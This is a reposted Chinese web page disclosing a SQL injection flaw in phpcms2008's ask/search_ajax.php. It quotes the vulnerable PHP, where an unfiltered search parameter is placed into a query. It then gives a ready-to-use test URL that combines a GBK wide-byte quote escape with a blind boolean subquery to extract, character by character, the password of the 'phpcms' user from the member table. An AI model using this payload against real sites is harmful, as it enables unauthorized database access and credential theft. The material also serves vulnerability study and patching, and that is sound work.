手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >phpcms2008 注入漏洞
phpcms2008 注入漏洞
摘要:这个是最新有人发现的该漏洞文件:ask/search_ajax.php漏洞说明:/ask/search_ajax.phpCode:if($q...

这个是最新有人发现的

该漏洞文件:ask/search_ajax.php

漏洞说明:

/ask/search_ajax.php

Code:

if($q)

{

$where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where

}

else

{

exit('null');

}

$infos = $ask->listinfo($where, 'askid DESC', '', 10);

/ask/include/answer.class.php

Code:

function listinfo($where = '', $order = '', $page = 1, $pagesize = 50)

{

if($where) $where = " WHERE $where";

if($order) $order = " ORDER BY $order";

$page = max(intval($page), 1);

$offset = $pagesize*($page-1);

$limit = " LIMIT $offset, $pagesize";

$r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where");

$number = $r['number'];

$this->pages = pages($number, $page, $pagesize);

$array = array();

$i = 1;

$result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit");

while($r = $this->db->fetch_array($result))

{

$r['orderid'] = $i;

$array[] = $r;

$i++;

}

$this->number = $this->db->num_rows($result);

$this->db->free_result($result);

return $array;

}

测试方法:

/ask/search_ajax.php?q=s%D5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23

【phpcms2008 注入漏洞】相关文章:

PHPCMS2008广告模板SQL注入漏洞修复

Microsoft SharePoint 服务器源码 HTML 注入漏洞

Adobe Acrobat 存在URL处理命名注入漏洞

动易4.03上传漏洞

BBSXP2008存在后台注射漏洞

WordPress WassUp插件 spy.php脚本含SQL注入漏洞

Nessus扫描漏洞使用教程

入侵检测系统漏洞的分析

hzhost虚拟主机系统致命漏洞

WordPress AdServe的adclick.ph 远程SQL注入漏洞

精品推荐
分类导航